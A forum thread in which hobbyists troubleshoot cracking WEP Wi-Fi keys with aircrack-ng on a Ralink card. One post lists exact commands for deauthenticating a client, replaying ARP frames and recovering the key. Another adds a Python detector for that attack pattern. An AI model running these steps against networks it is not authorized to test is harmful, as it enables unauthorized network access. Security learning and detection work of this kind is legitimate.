
Thread: Wireless Cracking WEP + Slow gathering IV's

  1. #1
    Just burned his ISO
    Join Date
    Feb 2008
    Posts
    8

    Wireless Cracking WEP + Slow gathering IV's

    I have a rausb0 card and when I followed xplotiz's tutorial everything works except when I try and crack the WEP key.

    For some reason I get IVs really slowly, like 20 in 5 minutes.

    Is this because my network does not have much traffic?
    And if this is true, how can I increase the traffic without logging into it?

  2. #2
    Junior Member
    Join Date
    Feb 2008
    Posts
    36


    http://forums.remote-exploit.org/showthread.php?t=9063

    Also, make certain that your WNIC supports injection and is in monitor mode.

  3. #3
    Just burned his ISO
    Join Date
    Sep 2007
    Posts
    19


    Many factors can slow you down. Your proximity to the access point is one. Another rather foolish mistake I have made in the past is not specifying a channel. This will cause you to collect the packets you want only intermittently, slowing you down greatly. And to continue with what GunMonkey asked, what is the result of the following command:

    Code:
    bt ~ # aireplay-ng -9 rausb0

  4. #4
    Just burned his ISO
    Join Date
    Feb 2008
    Posts
    8

    Thanks for your reply. I think my problem is just that there is no traffic, so I have to wait a while.

  5. #5
    Just burned his ISO
    Join Date
    Sep 2007
    Posts
    19

    As long as there is one client associated with that network you can gather enough IVs to crack it in, say, under a minute. What you need to do (which I am sure is explained clearly in the tutorial) is find the client associated with the AP and de-authenticate him/her. This will force the reconnect and allow you to replay the ARP requests that follow next. Here are the EXACT steps I used to crack my WEP.

    Code:
    1: bt ~ # ifconfig rausb0 up
    2: bt ~ # iwconfig rausb0 mode monitor channel *channel* rate 1m
    3: bt ~ # iwpriv rausb0 forceprism 1
    4: bt ~ # iwpriv rausb0 rfmontx 1
    5: bt ~ # airodump-ng --channel *channel* -b *00:bssid:00* -w *capfile* rausb0
    6: bt ~ # aireplay-ng -0 5 -a *00:bssid:00* -c *00:client mac:00* rausb0
    7: bt ~ # aireplay-ng --arpreplay -b *00:bssid:00* -h *mac of associated client* rausb0
    8: bt ~ # aircrack-ng -z -b *00:bssid:00* *capfile*.cap
    NOTE: It may be necessary to set your MAC to that of the client you wish to disassociate from the AP. It was not necessary for me and I don't really see why it would be but others claim it is.

    Obviously the starred items are variables; set them to the appropriate values. Lines 1-4 put a Ralink USB dongle into monitor mode, assuming you are using the correct drivers and configuration (line 4 is important for the replay attack). Backtrack 2 does NOT have the right configuration for Ralink by default (BT3b does).

    Keep in mind I was about 4 feet away from the router so obviously the signal strength was not a limiting factor.

    Let me know how this works out for you.
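
The deauth-then-ARP-replay sequence in the steps above leaves two signatures a wireless IDS or an admin reviewing a capture can look for: a burst of deauthentication frames aimed at one client, and one station repeating the same WEP IV far more often than a normal sender would. The following is an added detection example, not code from this thread or from the aircrack-ng project; the frame records and MAC addresses are constructed placeholders, not parsed from a real capture.

```python
"""Flag the two signatures of a forced-reconnect + ARP-replay WEP attack
over simple frame records (constructed dicts, not a real pcap)."""
from collections import Counter, defaultdict

DEAUTH_THRESHOLD = 5      # deauths to one client inside the window
WINDOW_SECONDS = 2.0      # sliding window for the deauth burst
REPLAY_THRESHOLD = 20     # identical (src, IV) WEP data frames


def detect_deauth_bursts(frames, threshold=DEAUTH_THRESHOLD, window=WINDOW_SECONDS):
    """Return {client_mac: peak_count} for clients that received at least
    `threshold` deauth frames within any `window` seconds."""
    per_client = defaultdict(list)
    for f in frames:
        if f["type"] == "deauth":
            per_client[f["dst"]].append(f["ts"])
    alerts = {}
    for client, times in per_client.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1          # slide the window forward
            count = end - start + 1
            if count >= threshold:
                alerts[client] = max(alerts.get(client, 0), count)
    return alerts


def detect_iv_replay(frames, threshold=REPLAY_THRESHOLD):
    """Return {(src, iv): count} where one sender reuses a single WEP IV
    at least `threshold` times, the footprint of an injected replay."""
    seen = Counter((f["src"], f["iv"])
                   for f in frames if f["type"] == "data" and f.get("wep"))
    return {k: n for k, n in seen.items() if n >= threshold}


# Constructed sample traffic with placeholder MACs (assumption, not real data)
AP = "00:11:22:33:44:55"
CLIENT = "66:77:88:99:aa:bb"
SAMPLE = [{"ts": 0.1 * i, "type": "deauth", "src": AP, "dst": CLIENT} for i in range(8)]
SAMPLE += [{"ts": 1.0 + 0.01 * i, "type": "data", "src": CLIENT, "dst": AP,
            "wep": True, "iv": "a1b2c3"} for i in range(30)]   # replayed ARP
SAMPLE += [{"ts": 3.0 + i, "type": "data", "src": CLIENT, "dst": AP,
            "wep": True, "iv": f"0000{i:02x}"} for i in range(5)]  # normal IVs

if __name__ == "__main__":
    print("deauth bursts:", detect_deauth_bursts(SAMPLE))
    print("IV replay:", detect_iv_replay(SAMPLE))
```

Normal stations change the IV on every frame, so a repeated (sender, IV) pair combined with a preceding deauth burst against the same client is a strong indicator of the replay described in the steps above.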

  6. #6
    Just burned his ISO
    Join Date
    Jan 2008
    Posts
    22


    Hello,
    I have a rausb device too but I'm having difficulties in cracking WEP, meaning my auth/deauth is not working. I'm next to my AP, which is a D-Link, and when I type:

    aireplay-ng -1 0 -a (bssid) -h (mac address of client) rausb0 it says:

    Sending Authentication Request (Open System) a few times and then:
    Attack was unsuccessful ..

    1. I'm very close to the AP so distance isn't a problem.
    Card supports injection.
    I think MAC filtering is off, but if it was on couldn't I still auth/deauth using a cloned MAC?
    I'll look in the D-Link's settings and see if filtering is on or off.

    Also tried wesside-ng but I get the error max retransmits for 30 bytes, and when I tried the -k 1 solution it says invalid option --k ......

  7. #7
    Just burned his ISO
    Join Date
    Feb 2008
    Posts
    8


    Quote Originally Posted by ne0_ang3lz View Post
    Hello,
    I have a rausb device too but I'm having difficulties in cracking WEP, meaning my auth/deauth is not working. I'm next to my AP, which is a D-Link, and when I type:

    aireplay-ng -1 0 -a (bssid) -h (mac address of client) rausb0 it says:

    Sending Authentication Request (Open System) a few times and then:
    Attack was unsuccessful ..
    I think your problem is that it is meant to go
    aireplay-ng -1 0 -a (mac address of client) -h (Your rausb0 mac address) rausb0

  8. #8
    Just burned his ISO
    Join Date
    Sep 2007
    Posts
    19


    Ok so what are the errors you are getting when you type in the commands I posted? You are using the commands I posted, aren't you?

    Which Backtrack are you using? 2 or 3b? If you are using 2, see this thread.

    Quote Originally Posted by ne0_ang3lz View Post
    ...I think MAC filtering is off, but if it was on couldn't I still auth/deauth using a cloned MAC?...
    You "think MAC filtering is off?" Haha, it's your AP, so log in and check it out. Turn it off if it is giving you a problem and see how you do without it.

  9. #9
    Just burned his ISO
    Join Date
    Jan 2008
    Posts
    22

    I am using the correct commands ...
    Yes, it is my AP, but I didn't know where MAC filtering was, that's why I said I don't know for sure ... I looked at the settings more carefully and the MAC filter was on; I turned it off and now it works ... but I get IVs really slowly and there aren't enough to crack the WEP key ... I'll put something to download on my client and make some traffic and see how that goes ...

  10. #10
    Just burned his ISO
    Join Date
    Feb 2008
    Posts
    8

    Quote Originally Posted by ne0_ang3lz View Post
    I am using the correct commands ...
    Yes, it is my AP, but I didn't know where MAC filtering was, that's why I said I don't know for sure ... I looked at the settings more carefully and the MAC filter was on; I turned it off and now it works ... but I get IVs really slowly and there aren't enough to crack the WEP key ... I'll put something to download on my client and make some traffic and see how that goes ...
    Or you can wait 10 mins and it will have enough.
